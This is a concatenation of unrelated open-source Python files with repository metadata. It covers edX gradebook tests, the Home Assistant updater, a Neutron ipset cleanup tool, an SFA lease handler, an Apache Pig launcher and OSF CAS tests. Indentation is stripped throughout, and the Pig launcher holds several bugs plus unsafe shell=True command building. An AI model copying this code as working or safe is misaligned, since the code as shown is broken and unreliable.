self.users = [UserFactory.create() for _ in xrange(USER_COUNT)]
for user in self.users:
CourseEnrollmentFactory.create(user=user, course_id=self.course.id)
for i, item in enumerate(self.items):
for j, user in enumerate(self.users):
StudentModuleFactory.create(
grade=1 if i < j else 0,
max_grade=1,
student=user,
course_id=self.course.id,
module_state_key=item.location
)
compute_all_grades_for_course.apply_async(kwargs={'course_key': text_type(self.course.id)})
self.response = self.client.get(reverse(
'spoc_gradebook',
args=(text_type(self.course.id),)
))
self.assertEquals(self.response.status_code, 200)
@attr(shard=1)
class TestDefaultGradingPolicy(TestGradebook):
"""
Tests that the grading policy is properly applied for all users in the course
Uses the default policy (50% passing rate)
"""
def test_all_users_listed(self):
for user in self.users:
self.assertIn(user.username, text_type(self.response.content, 'utf-8'))
def test_default_policy(self):
# Default >= 50% passes, so Users 5-10 should be passing for Homework 1 [6]
# One use at the top of the page [1]
self.assertEquals(7, self.response.content.count('grade_Pass'))
# Users 1-5 attempted Homework 1 (and get Fs) [4]
# Users 1-10 attempted any homework (and get Fs) [10]
# Users 4-10 scored enough to not get rounded to 0 for the class (and get Fs) [7]
# One use at top of the page [1]
self.assertEquals(22, self.response.content.count('grade_F'))
# All other grades are None [29 categories * 11 users - 27 non-empty grades = 292]
# One use at the top of the page [1]
self.assertEquals(293, self.response.content.count('grade_None'))
@attr(shard=1)
class TestLetterCutoffPolicy(TestGradebook):
"""
Tests advanced grading policy (with letter grade cutoffs). Includes tests of
UX display (color, etc).
"""
grading_policy = {
"GRADER": [
{
"type": "Homework",
"min_count": 1,
"drop_count": 0,
"short_label": "HW",
"weight": 1
},
],
"GRADE_CUTOFFS": {
'A': .9,
'B': .8,
'C': .7,
'D': .6,
}
}
def test_styles(self):
self.assertIn("grade_A {color:green;}", self.response.content)
self.assertIn("grade_B {color:Chocolate;}", self.response.content)
self.assertIn("grade_C {color:DarkSlateGray;}", self.response.content)
self.assertIn("grade_D {color:DarkSlateGray;}", self.response.content)
def test_assigned_grades(self):
# Users 9-10 have >= 90% on Homeworks [2]
# Users 9-10 have >= 90% on the class [2]
# One use at the top of the page [1]
self.assertEquals(5, self.response.content.count('grade_A'))
# User 8 has 80 <= Homeworks < 90 [1]
# User 8 has 80 <= class < 90 [1]
# One use at the top of the page [1]
self.assertEquals(3, self.response.content.count('grade_B'))
# User 7 has 70 <= Homeworks < 80 [1]
# User 7 has 70 <= class < 80 [1]
# One use at the top of the page [1]
self.assertEquals(3, self.response.content.count('grade_C'))
# User 6 has 60 <= Homeworks < 70 [1]
# User 6 has 60 <= class < 70 [1]
# One use at the top of the page [1]
self.assertEquals(3, self.response.content.count('grade_C'))
# Users 1-5 have 60% > grades > 0 on Homeworks [5]
# Users 1-5 have 60% > grades > 0 on the class [5]
# One use at top of the page [1]
self.assertEquals(11, self.response.content.count('grade_F'))
# User 0 has 0 on Homeworks [1]
# User 0 has 0 on the class [1]
# One use at the top of the page [1]
self.assertEquals(3, self.response.content.count('grade_None'))
|
hastexo/edx-platform
|
lms/djangoapps/instructor/tests/test_spoc_gradebook.py
|
Python
|
agpl-3.0
| 6,456
|
from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
class CoreConfig(AppConfig):
name = "core"
verbose_name = _("Hosting Service Core")
|
tejo-esperanto/pasportaservo
|
core/apps.py
|
Python
|
agpl-3.0
| 184
|
"""
Support to check for available updates.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/updater/
"""
import asyncio
import json
import logging
import os
import platform
import uuid
from datetime import timedelta
# pylint: disable=no-name-in-module, import-error
from distutils.version import StrictVersion
import aiohttp
import async_timeout
import voluptuous as vol
from homeassistant.helpers.aiohttp_client import async_get_clientsession
import homeassistant.helpers.config_validation as cv
import homeassistant.util.dt as dt_util
from homeassistant.const import (
ATTR_FRIENDLY_NAME, __version__ as CURRENT_VERSION)
from homeassistant.helpers import event
REQUIREMENTS = ['distro==1.0.4']
_LOGGER = logging.getLogger(__name__)
ATTR_RELEASE_NOTES = 'release_notes'
CONF_REPORTING = 'reporting'
CONF_COMPONENT_REPORTING = 'include_used_components'
DOMAIN = 'updater'
ENTITY_ID = 'updater.updater'
UPDATER_URL = 'https://updater.home-assistant.io/'
UPDATER_UUID_FILE = '.uuid'
CONFIG_SCHEMA = vol.Schema({DOMAIN: {
vol.Optional(CONF_REPORTING, default=True): cv.boolean,
vol.Optional(CONF_COMPONENT_REPORTING, default=False): cv.boolean,
}}, extra=vol.ALLOW_EXTRA)
RESPONSE_SCHEMA = vol.Schema({
vol.Required('version'): str,
vol.Required('release-notes'): cv.url,
})
def _create_uuid(hass, filename=UPDATER_UUID_FILE):
"""Create UUID and save it in a file."""
with open(hass.config.path(filename), 'w') as fptr:
_uuid = uuid.uuid4().hex
fptr.write(json.dumps({'uuid': _uuid}))
return _uuid
def _load_uuid(hass, filename=UPDATER_UUID_FILE):
"""Load UUID from a file or return None."""
try:
with open(hass.config.path(filename)) as fptr:
jsonf = json.loads(fptr.read())
return uuid.UUID(jsonf['uuid'], version=4).hex
except (ValueError, AttributeError):
return None
except FileNotFoundError:
return _create_uuid(hass, filename)
@asyncio.coroutine
def async_setup(hass, config):
"""Set up the updater component."""
if 'dev' in CURRENT_VERSION:
# This component only makes sense in release versions
_LOGGER.warning("Running on 'dev', only analytics will be submitted")
config = config.get(DOMAIN, {})
if config.get(CONF_REPORTING):
huuid = yield from hass.async_add_job(_load_uuid, hass)
else:
huuid = None
include_components = config.get(CONF_COMPONENT_REPORTING)
@asyncio.coroutine
def check_new_version(now):
"""Check if a new version is available and report if one is."""
result = yield from get_newest_version(hass, huuid,
include_components)
if result is None:
return
newest, releasenotes = result
if newest is None or 'dev' in CURRENT_VERSION:
return
if StrictVersion(newest) > StrictVersion(CURRENT_VERSION):
_LOGGER.info("The latest available version is %s", newest)
hass.states.async_set(
ENTITY_ID, newest, {ATTR_FRIENDLY_NAME: 'Update Available',
ATTR_RELEASE_NOTES: releasenotes}
)
elif StrictVersion(newest) == StrictVersion(CURRENT_VERSION):
_LOGGER.info(
"You are on the latest version (%s) of Home Assistant", newest)
# Update daily, start 1 hour after startup
_dt = dt_util.utcnow() + timedelta(hours=1)
event.async_track_utc_time_change(
hass, check_new_version,
hour=_dt.hour, minute=_dt.minute, second=_dt.second)
return True
@asyncio.coroutine
def get_system_info(hass, include_components):
"""Return info about the system."""
info_object = {
'arch': platform.machine(),
'dev': 'dev' in CURRENT_VERSION,
'docker': False,
'os_name': platform.system(),
'python_version': platform.python_version(),
'timezone': dt_util.DEFAULT_TIME_ZONE.zone,
'version': CURRENT_VERSION,
'virtualenv': os.environ.get('VIRTUAL_ENV') is not None,
}
if include_components:
info_object['components'] = list(hass.config.components)
if platform.system() == 'Windows':
info_object['os_version'] = platform.win32_ver()[0]
elif platform.system() == 'Darwin':
info_object['os_version'] = platform.mac_ver()[0]
elif platform.system() == 'FreeBSD':
info_object['os_version'] = platform.release()
elif platform.system() == 'Linux':
import distro
linux_dist = yield from hass.async_add_job(
distro.linux_distribution, False)
info_object['distribution'] = linux_dist[0]
info_object['os_version'] = linux_dist[1]
info_object['docker'] = os.path.isfile('/.dockerenv')
return info_object
@asyncio.coroutine
def get_newest_version(hass, huuid, include_components):
"""Get the newest Home Assistant version."""
if huuid:
info_object = yield from get_system_info(hass, include_components)
info_object['huuid'] = huuid
else:
info_object = {}
session = async_get_clientsession(hass)
try:
with async_timeout.timeout(5, loop=hass.loop):
req = yield from session.post(UPDATER_URL, json=info_object)
_LOGGER.info(("Submitted analytics to Home Assistant servers. "
"Information submitted includes %s"), info_object)
except (asyncio.TimeoutError, aiohttp.ClientError):
_LOGGER.error("Could not contact Home Assistant Update to check "
"for updates")
return None
try:
res = yield from req.json()
except ValueError:
_LOGGER.error("Received invalid JSON from Home Assistant Update")
return None
try:
res = RESPONSE_SCHEMA(res)
return (res['version'], res['release-notes'])
except vol.Invalid:
_LOGGER.error('Got unexpected response: %s', res)
return None
|
alexmogavero/home-assistant
|
homeassistant/components/updater.py
|
Python
|
apache-2.0
| 6,075
|
# Copyright (c) 2015 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from neutron._i18n import _LE, _LI
from neutron.agent.linux import utils
from neutron.common import config
from neutron.conf.agent import cmd as command
LOG = logging.getLogger(__name__)
def setup_conf():
"""Setup the cfg for the clean up utility.
Use separate setup_conf for the utility because there are many options
from the main config that do not apply during clean-up.
"""
conf = cfg.CONF
command.register_cmd_opts(command.ip_opts, conf)
return conf
def remove_iptables_reference(ipset):
# Remove any iptables reference to this IPset
cmd = ['iptables-save'] if 'IPv4' in ipset else ['ip6tables-save']
iptables_save = utils.execute(cmd, run_as_root=True)
if ipset in iptables_save:
cmd = ['iptables'] if 'IPv4' in ipset else ['ip6tables']
LOG.info(_LI("Removing iptables rule for IPset: %s"), ipset)
for rule in iptables_save.splitlines():
if '--match-set %s ' % ipset in rule and rule.startswith('-A'):
# change to delete
params = rule.split()
params[0] = '-D'
try:
utils.execute(cmd + params, run_as_root=True)
except Exception:
LOG.exception(_LE('Error, unable to remove iptables rule '
'for IPset: %s'), ipset)
def destroy_ipset(conf, ipset):
# If there is an iptables reference and we don't remove it, the
# IPset removal will fail below
if conf.force:
remove_iptables_reference(ipset)
LOG.info(_LI("Destroying IPset: %s"), ipset)
cmd = ['ipset', 'destroy', ipset]
try:
utils.execute(cmd, run_as_root=True)
except Exception:
LOG.exception(_LE('Error, unable to destroy IPset: %s'), ipset)
def cleanup_ipsets(conf):
# Identify ipsets for destruction.
LOG.info(_LI("Destroying IPsets with prefix: %s"), conf.prefix)
cmd = ['ipset', '-L', '-n']
ipsets = utils.execute(cmd, run_as_root=True)
for ipset in ipsets.split('\n'):
if conf.allsets or ipset.startswith(conf.prefix):
destroy_ipset(conf, ipset)
LOG.info(_LI("IPset cleanup completed successfully"))
def main():
"""Main method for cleaning up IPsets.
The utility is designed to clean-up after the forced or unexpected
termination of Neutron agents.
The --allsets flag should only be used as part of the cleanup of a devstack
installation as it will blindly destroy all IPsets.
"""
conf = setup_conf()
conf()
config.setup_logging()
cleanup_ipsets(conf)
|
sebrandon1/neutron
|
neutron/cmd/ipset_cleanup.py
|
Python
|
apache-2.0
| 3,313
|
from openflow.optin_manager.sfa.util.sfalogging import logger
from openflow.optin_manager.sfa.util.xml import XpathFilter
from openflow.optin_manager.sfa.util.xrn import Xrn
from openflow.optin_manager.sfa.rspecs.elements.element import Element
from openflow.optin_manager.sfa.rspecs.elements.node import Node
from openflow.optin_manager.sfa.rspecs.elements.sliver import Sliver
from openflow.optin_manager.sfa.rspecs.elements.location import Location
from openflow.optin_manager.sfa.rspecs.elements.hardware_type import HardwareType
from openflow.optin_manager.sfa.rspecs.elements.disk_image import DiskImage
from openflow.optin_manager.sfa.rspecs.elements.interface import Interface
from openflow.optin_manager.sfa.rspecs.elements.bwlimit import BWlimit
from openflow.optin_manager.sfa.rspecs.elements.pltag import PLTag
from openflow.optin_manager.sfa.rspecs.elements.versions.sfav1Sliver import SFAv1Sliver
from openflow.optin_manager.sfa.rspecs.elements.versions.sfav1PLTag import SFAv1PLTag
from openflow.optin_manager.sfa.rspecs.elements.versions.pgv2Services import PGv2Services
from openflow.optin_manager.sfa.rspecs.elements.lease import Lease
from sfa.planetlab.plxrn import xrn_to_hostname
class SFAv1Lease:
@staticmethod
def add_leases(xml, leases):
network_elems = xml.xpath('//network')
if len(network_elems) > 0:
network_elem = network_elems[0]
elif len(leases) > 0:
network_urn = Xrn(leases[0]['component_id']).get_authority_urn().split(':')[0]
network_elem = xml.add_element('network', name = network_urn)
else:
network_elem = xml
# group the leases by slice and timeslots
grouped_leases = []
while leases:
slice_id = leases[0]['slice_id']
start_time = leases[0]['start_time']
duration = leases[0]['duration']
group = []
for lease in leases:
if slice_id == lease['slice_id'] and start_time == lease['start_time'] and duration == lease['duration']:
group.append(lease)
grouped_leases.append(group)
for lease1 in group:
leases.remove(lease1)
lease_elems = []
for lease in grouped_leases:
#lease_fields = ['lease_id', 'component_id', 'slice_id', 'start_time', 'duration']
lease_fields = ['slice_id', 'start_time', 'duration']
lease_elem = network_elem.add_instance('lease', lease[0], lease_fields)
lease_elems.append(lease_elem)
# add nodes of this lease
for node in lease:
lease_elem.add_instance('node', node, ['component_id'])
# lease_elems = []
# for lease in leases:
# lease_fields = ['lease_id', 'component_id', 'slice_id', 'start_time', 'duration']
# lease_elem = network_elem.add_instance('lease', lease, lease_fields)
# lease_elems.append(lease_elem)
@staticmethod
def get_leases(xml, filter={}):
xpath = '//lease%s | //default:lease%s' % (XpathFilter.xpath(filter), XpathFilter.xpath(filter))
lease_elems = xml.xpath(xpath)
return SFAv1Lease.get_lease_objs(lease_elems)
@staticmethod
def get_lease_objs(lease_elems):
leases = []
for lease_elem in lease_elems:
#get nodes
node_elems = lease_elem.xpath('./default:node | ./node')
for node_elem in node_elems:
lease = Lease(lease_elem.attrib, lease_elem)
lease['slice_id'] = lease_elem.attrib['slice_id']
lease['start_time'] = lease_elem.attrib['start_time']
lease['duration'] = lease_elem.attrib['duration']
lease['component_id'] = node_elem.attrib['component_id']
leases.append(lease)
return leases
# leases = []
# for lease_elem in lease_elems:
# lease = Lease(lease_elem.attrib, lease_elem)
# if lease.get('lease_id'):
# lease['lease_id'] = lease_elem.attrib['lease_id']
# lease['component_id'] = lease_elem.attrib['component_id']
# lease['slice_id'] = lease_elem.attrib['slice_id']
# lease['start_time'] = lease_elem.attrib['start_time']
# lease['duration'] = lease_elem.attrib['duration']
# leases.append(lease)
# return leases
|
dana-i2cat/felix
|
optin_manager/src/python/openflow/optin_manager/sfa/rspecs/elements/versions/sfav1Lease.py
|
Python
|
apache-2.0
| 4,499
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# 'License'); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# The Pig command script
#
# Environment Variables
#
# JAVA_HOME The java implementation to use. Overrides JAVA_HOME.
#
# PIG_CLASSPATH Extra Java CLASSPATH entries.
#
# HADOOP_HOME/HADOOP_PREFIX Environment HADOOP_HOME/HADOOP_PREFIX(0.20.205)
#
# HADOOP_CONF_DIR Hadoop conf dir
#
# PIG_HEAPSIZE The maximum amount of heap to use, in MB.
# Default is 1000.
#
# PIG_OPTS Extra Java runtime options.
#
# PIG_CONF_DIR Alternate conf dir. Default is ${PIG_HOME}/conf.
#
# HBASE_CONF_DIR - Optionally, the HBase configuration to run against
# when using HBaseStorage
import sys
import os
import glob
import subprocess
debug = False
restArgs = []
includeHCatalog = False
additionalJars = ""
for arg in sys.argv:
if arg == __file__:
continue
if arg == "-secretDebugCmd":
debug = True
elif arg == "-useHCatalog":
includeHCatalog = True
elif arg.split("=")[0] == "-D.pig.additional.jars":
if includeHCatalog == True:
additionalJars = arg.split("=")[1]
else:
restArgs.append(arg)
else:
restArgs.append(arg)
# Determine our absolute path, resolving any symbolic links
this = os.path.realpath(sys.argv[0])
bindir = os.path.dirname(this) + os.path.sep
# the root of the pig installation
os.environ['PIG_HOME'] = os.path.join(bindir, os.path.pardir)
if 'PIG_CONF_DIR' not in os.environ:
pigPropertiesPath = os.path.join(os.environ['PIG_HOME'], 'conf', 'pig.properties')
if os.path.exists(pigPropertiesPath):
try:
fhdl = open(pigPropertiesPath, 'r')
fhdl.close()
os.environ['PIG_CONF_DIR'] = os.path.join(os.environ['PIG_HOME'], 'conf')
except:
# in the small window after checking for file, if file is deleted,
# we should fail if we hit an exception
sys.exit('Failed to access file %s' % pigPropertiesPath)
elif os.path.exists(os.path.join(os.path.sep, 'etc', 'pig')):
os.environ['PIG_CONF_DIR'] = os.path.join(os.path.sep, 'etc', 'pig')
else:
sys.exit('Cannot determine PIG_CONF_DIR. Please set it to the directory containing pig.properties')
# Hack to get to read a shell script and the changes to the environment it makes
# This is potentially bad because we could execute arbitrary code
try:
importScript = os.path.join(os.environ['PIG_CONF_DIR'], 'runPigEnv.sh')
fd = open(importScript, 'w')
fd.write(". " + os.path.join(os.environ['PIG_CONF_DIR'], 'pig-env.sh'))
fd.write("\n")
fd.write("set")
fd.close()
outFd = open(os.path.join(os.environ['PIG_CONF_DIR'], 'pigStartPython.out'), 'w')
output = subprocess.Popen(importScript, shell=True, stdout=outFd)
output.wait()
outFd.close()
outFd = open(os.path.join(os.environ['PIG_CONF_DIR'], 'pigStartPython.out'), 'r')
for line in outFd:
if line.split(' ') > 1:
continue
envSplit = line.split('=')
if len(envSplit) == 2:
os.environ[envSplit[0]] = os.environ[1]
outFd.close()
except:
pass
# functionality similar to the shell script. This executes a pig script instead
try:
if os.path.exists(os.environ['PIG_CONF_DIR'], 'pig.conf'):
pigConf = os.path.join(os.environ['PIG_CONF_DIR'], 'pig.conf')
__import__(pigConf)
except:
pass
if 'JAVA_HOME' not in os.environ:
sys.exit('Error: JAVA_HOME is not set')
if 'HADOOP_HOME' not in os.environ:
os.environ['HADOOP_HOME'] = os.path.sep + 'usr'
java = os.path.join(os.environ['JAVA_HOME'], 'bin', 'java')
javaHeapMax = "-Xmx1000m"
if 'PIG_HEAPSIZE' in os.environ:
javaHeapMax = '-Xmx' + os.environ['PIG_HEAPSIZE'] + 'm'
classpath = os.environ['PIG_CONF_DIR']
classpath += os.pathsep + os.path.join(os.environ['JAVA_HOME'], 'lib', 'tools.jar')
if 'PIG_CLASSPATH' in os.environ:
classpath += os.pathsep + os.environ['PIG_CLASSPATH']
if 'HADOOP_CONF_DIR' in os.environ:
classpath += os.pathsep + os.environ['HADOOP_CONF_DIR']
pigLibJars = glob.glob(os.path.join(os.environ['PIG_HOME'], "lib", "*.jar"))
for jar in pigLibJars:
classpath += os.pathsep + jar
######### if hcatalog is to be included, add hcatalog and its required jars
if includeHCatalog == True:
# adding the hive jars required by hcatalog
hiveJarLoc = ""
if 'HIVE_HOME' in os.environ:
hiveJarLoc = os.path.join(os.environ['HIVE_HOME'], "lib")
else:
if os.path.exists(os.path.join('usr', 'lib', 'hive')):
hiveJarLoc = os.path.join('usr', 'lib', 'hive', 'lib')
else:
sys.exit("Please initialize HIVE_HOME to the hive install directory")
allHiveJars = ["hive-metastore-*.jar", "libthrift-*.jar", "hive-exec-*.jar", "libfb303-*.jar", "jdo2-api-*-ec.jar", "slf4j-api-*.jar", "hive-hbase-handler-*.jar"]
for jarName in allHiveJars:
jar = glob.glob(os.path.join(hiveJarLoc, jarName))
if (len(jar) != 0) and (os.path.exists(jar)):
classpath += os.pathsep + jar[0]
else:
sys.exit("Failed to find the jar %s" % os.path.join(hiveJarLoc, jarName))
# done with adding the hive jars required by hcatalog
# adding the hcat jars
hcatHome = ""
if 'HCAT_HOME' in os.environ:
hcatHome = os.environ['HCAT_HOME']
else:
if os.path.exists(os.path.join(os.path.sep + "usr", "lib", "hcatalog")):
hcatHome = os.path.join(os.path.sep + "usr", "lib", "hcatalog")
else:
sys.exit("Please initialize HCAT_HOME to the hcatalog install directory")
hcatJars = glob.glob(os.path.join(hcatHome, "share", "hcatalog", "hcatalog-*.jar"))
found = False
for hcatJar in hcatJars:
if hcatJar.find("server") != -1:
found = True
classpath += os.pathsep + hcatJar
break
if found == False:
sys.exit("Failed to find the hcatalog server jar in %s" % (os.path.join(hcatHome, "share", "hcatalog")))
hcatHBaseJar = glob.glob(os.path.join(hcatHome, "lib", "hbase-storage-handler-*.jar"))
try:
classpath += os.pathsep + hcatHBaseJar[0]
except:
pass
# done with adding the hcat jars
# now also add the additional jars passed through the command line
classpath += os.pathsep + additionalJars
# done adding the additional jars from the command line
######### done with adding hcatalog and related jars
######### Add the jython jars to classpath
jythonJars = glob.glob(os.path.join(os.environ['PIG_HOME'], "lib", "jython*.jar"))
if len(jythonJars) == 1:
classpath += os.pathsep + jythonJars[0]
else:
jythonJars = glob.glob(os.path.join(os.environ['PIG_HOME'], "build", "ivy", "lib", "Pig", "jython*.jar"))
if len(jythonJars) == 1:
classpath += os.pathsep + jythonJars[0]
######### Done adding the jython jars to classpath
######### Add the jruby jars to classpath
jrubyJars = glob.glob(os.path.join(os.environ['PIG_HOME'], "lib", "jruby-complete-*.jar"))
if len(jrubyJars) == 1:
classpath += os.pathsep + jrubyJars[0]
else:
jrubyJars = glob.glob(os.path.join(os.environ['PIG_HOME'], "build", "ivy", "lib", "Pig", "jruby-complete-*.jar"))
if len(jrubyJars) == 1:
classpath += os.pathsep + jrubyJars[0]
pigJars = glob.glob(os.path.join(os.environ['PIG_HOME'], "share", "pig", "lib", "*.jar"))
for jar in pigJars:
classpath += os.pathsep + jar
######### Done adding jruby jars to classpath
######### Add hadoop and hbase conf directories
hadoopConfDir = os.path.join(os.environ['PIG_HOME'], "etc", "hadoop")
if os.path.exists(hadoopConfDir):
classpath += os.pathsep + hadoopConfDir
if 'HBASE_CONF_DIR' in os.environ:
classpath += os.pathsep + os.environ['HBASE_CONF_DIR']
else:
hbaseConfDir = os.path.join(os.path.sep + "etc", "hbase")
if os.path.exists(hbaseConfDir):
classpath += os.pathsep + hbaseConfDir
######### Done adding hadoop and hbase conf directories
######### Locate and add Zookeeper jars if they exist
zkDir = ""
if 'ZOOKEEPER_HOME' in os.environ:
zkDir = os.environ['ZOOKEEPER_HOME']
else:
zkDir = os.path.join(os.environ['PIG_HOME'], "share", "zookeeper")
if os.path.exists(zkDir):
zkJars = glob.glob(os.path.join(zkdir, "zookeeper-*.jar"))
for jar in zkJars:
classpath += os.pathsep + jar
######### Done adding zookeeper jars
######### Locate and add hbase jars if they exist
hbaseDir = ""
if 'HBASE_HOME' in os.environ:
hbaseDir = os.environ['HBASE_HOME']
else:
hbaseDir = os.path.join(os.environ['PIG_HOME'], "share", "hbase")
if os.path.exists(hbaseDir):
hbaseJars = glob.glob(os.path.join(hbaseDir, "hbase-*.jar"))
for jar in hbaseJars:
classpath += os.pathsep + jar
######### Done adding hbase jars
######### set the log directory and logfile if they don't exist
if 'PIG_LOG_DIR' not in os.environ:
pigLogDir = os.path.join(os.environ['PIG_HOME'], "logs")
if 'PIG_LOGFILE' not in os.environ:
pigLogFile = 'pid.log'
######### Done setting the logging directory and logfile
pigOpts = ""
try:
pigOpts = os.environ['PIG_OPTS']
except:
pass
pigOpts += " -Dpig.log.dir=" + pigLogDir
pigOpts += " -Dpig.log.file=" + pigLogFile
pigOpts += " -Dpig.home.dir=" + os.environ['PIG_HOME']
pigJar = ""
hadoopBin = ""
print "HADOOP_HOME: %s" % os.path.expandvars(os.environ['HADOOP_HOME'])
print "HADOOP_PREFIX: %s" % os.path.expandvars(os.environ['HADOOP_PREFIX'])
if (os.environ.get('HADOOP_PREFIX') is not None):
print "Found a hadoop prefix"
hadoopPrefixPath = os.path.expandvars(os.environ['HADOOP_PREFIX'])
if os.path.exists(os.path.join(hadoopPrefixPath, "bin", "hadoop")):
hadoopBin = os.path.join(hadoopPrefixPath, "bin", "hadoop")
if (os.environ.get('HADOOP_HOME') is not None):
print "Found a hadoop home"
hadoopHomePath = os.path.expandvars(os.environ['HADOOP_HOME'])
print "Hadoop home path: %s" % hadoopHomePath
if os.path.exists(os.path.join(hadoopHomePath, "bin", "hadoop")):
hadoopBin = os.path.join(hadoopHomePath, "bin", "hadoop")
if hadoopBin == "":
if os.path.exists(os.path.join(os.path.sep + "usr", "bin", "hadoop")):
hadoopBin = os.path.join(os.path.sep + "usr", "bin", "hadoop")
if hadoopBin != "":
if debug == True:
print "Find hadoop at %s" % hadoopBin
if os.path.exists(os.path.join(os.environ['PIG_HOME'], "pig-withouthadoop.jar")):
pigJar = os.path.join(os.environ['PIG_HOME'], "pig-withouthadoop.jar")
else:
pigJars = glob.glob(os.path.join(os.environ['PIG_HOME'], "pig-?.*withouthadoop.jar"))
if len(pigJars) == 1:
pigJar = pigJars[0]
elif len(pigJars) > 1:
print "Ambiguity with pig jars found the following jars"
print pigJars
sys.exit("Please remove irrelavant jars fromt %s" % os.path.join(os.environ['PIG_HOME'], "pig-?.*withouthadoop.jar"))
else:
pigJars = glob.glob(os.path.join(os.environ['PIG_HOME'], "share", "pig", "pig-*withouthadoop.jar"))
if len(pigJars) == 1:
pigJar = pigJars[0]
else:
sys.exit("Cannot locate pig-withouthadoop.jar do 'ant jar-withouthadoop', and try again")
if 'HADOOP_CLASSPATH' in os.environ:
os.environ['HADOOP_CLASSPATH'] += os.pathsep + classpath
else:
os.environ['HADOOP_CLASSPATH'] = classpath
if debug == True:
print "dry run:"
print "HADOOP_CLASSPATH: %s" % os.environ['HADOOP_CLASSPATH']
try:
print "HADOOP_OPTS: %s" % os.environ['HADOOP_OPTS']
except:
pass
print "%s jar %s %s" % (hadoopBin, pigJar, ' '.join(restArgs))
else:
cmdLine = hadoopBin + ' jar ' + pigJar + ' ' + ' '.join(restArgs)
subprocess.call(cmdLine, shell=True)
else:
# fall back to use fat pig.jar
if debug == True:
print "Cannot find local hadoop installation, using bundled hadoop 20.2"
if os.path.exists(os.path.join(os.environ['PIG_HOME'], "pig.jar")):
pigJar = os.path.join(os.environ['PIG_HOME'], "pig.jar")
else:
pigJars = glob.glob(os.path.join(os.environ['PIG_HOME'], "pig-?.!(*withouthadoop).jar"))
if len(pigJars) == 1:
pigJar = pigJars[0]
elif len(pigJars) > 1:
print "Ambiguity with pig jars found the following jars"
print pigJars
sys.exit("Please remove irrelavant jars fromt %s" % os.path.join(os.environ['PIG_HOME'], "pig-?.*withouthadoop.jar"))
else:
sys.exit("Cannot locate pig.jar. do 'ant jar' and try again")
classpath += os.pathsep + pigJar
pigClass = "org.apache.pig.Main"
if debug == True:
print "dry runXXX:"
print "%s %s %s -classpath %s %s %s" % (java, javaHeapMax, pigOpts, classpath, pigClass, ' '.join(restArgs))
else:
cmdLine = java + ' ' + javaHeapMax + ' ' + pigOpts
cmdLine += ' ' + '-classpath ' + classpath + ' ' + pigClass + ' ' + ' '.join(restArgs)
subprocess.call(cmdLine, shell=True)
|
siddaartha/spork
|
bin/pig.py
|
Python
|
apache-2.0
| 13,326
|
# -*- coding: utf-8 -*-
import furl
import responses
import mock
from nose.tools import * # flake8: noqa (PEP8 asserts)
import unittest
from framework.auth import cas
from tests.base import OsfTestCase, fake
from osf_tests.factories import UserFactory
def make_successful_response(user):
return cas.CasResponse(
authenticated=True,
user=user._id,
attributes={
'accessToken': fake.md5()
}
)
def make_failure_response():
return cas.CasResponse(
authenticated=False,
user=None,
)
def make_external_response(release=True, unicode=False):
attributes = {
'accessToken': fake.md5(),
}
if release:
attributes.update({
'given-names': fake.first_name() if not unicode else u'нет',
'family-name': fake.last_name() if not unicode else u'Да',
})
return cas.CasResponse(
authenticated=True,
user='OrcidProfile#{}'.format(fake.numerify('####-####-####-####')),
attributes=attributes
)
def generate_external_user_with_resp(service_url, user=True, release=True):
"""
Generate mock user, external credential and cas response for tests.
:param service_url: the service url
:param user: set to `False` if user does not exists
:param release: set to `False` if attributes are not released due to privacy settings
:return: existing user object or new user, valid external credential, valid cas response
"""
cas_resp = make_external_response(release=release)
validated_credentials = cas.validate_external_credential(cas_resp.user)
if user:
user = UserFactory.build()
user.external_identity = {
validated_credentials['provider']: {
validated_credentials['id']: 'VERIFIED'
}
}
user.save()
return user, validated_credentials, cas_resp
else:
user = {
'external_id_provider': validated_credentials['provider'],
'external_id': validated_credentials['id'],
'fullname': '',
'access_token': cas_resp.attributes['accessToken'],
'service_url': service_url,
}
return user, validated_credentials, cas_resp
RESPONSE_TEMPLATE = """
<cas:serviceResponse xmlns:cas='http://www.yale.edu/tp/cas'>
<cas:authenticationSuccess>
<cas:user>{user_id}</cas:user>
<cas:attributes>
<cas:isFromNewLogin>true</cas:isFromNewLogin>
<cas:authenticationDate>Tue May 19 02:20:19 UTC 2015</cas:authenticationDate>
<cas:givenName>{given_name}</cas:givenName>
<cas:familyName>{family_name}</cas:familyName>
<cas:longTermAuthenticationRequestTokenUsed>true</cas:longTermAuthenticationRequestTokenUsed>
<cas:accessToken>{access_token}</cas:accessToken>
<cas:username>{username}</cas:username>
</cas:attributes>
</cas:authenticationSuccess>
</cas:serviceResponse>
"""
def make_service_validation_response_body(user, access_token=None):
token = access_token or fake.md5()
return RESPONSE_TEMPLATE.format(
user_id=user._id,
given_name=user.given_name,
family_name=user.family_name,
username=user.username,
access_token=token
)
def test_parse_authorization_header():
token = fake.md5()
valid = 'Bearer {}'.format(token)
assert_equal(cas.parse_auth_header(valid), token)
missing_token = 'Bearer '
with assert_raises(cas.CasTokenError):
cas.parse_auth_header(missing_token)
class TestCASClient(OsfTestCase):
def setUp(self):
OsfTestCase.setUp(self)
self.base_url = 'http://accounts.test.test'
self.client = cas.CasClient(self.base_url)
@responses.activate
def test_service_validate(self):
user = UserFactory()
url = furl.furl(self.base_url)
url.path.segments.extend(('p3', 'serviceValidate',))
service_url = 'http://test.osf.io'
ticket = fake.md5()
body = make_service_validation_response_body(user, ticket)
responses.add(
responses.Response(
responses.GET,
url.url,
body=body,
status=200,
)
)
resp = self.client.service_validate(ticket, service_url)
assert_true(resp.authenticated)
@responses.activate
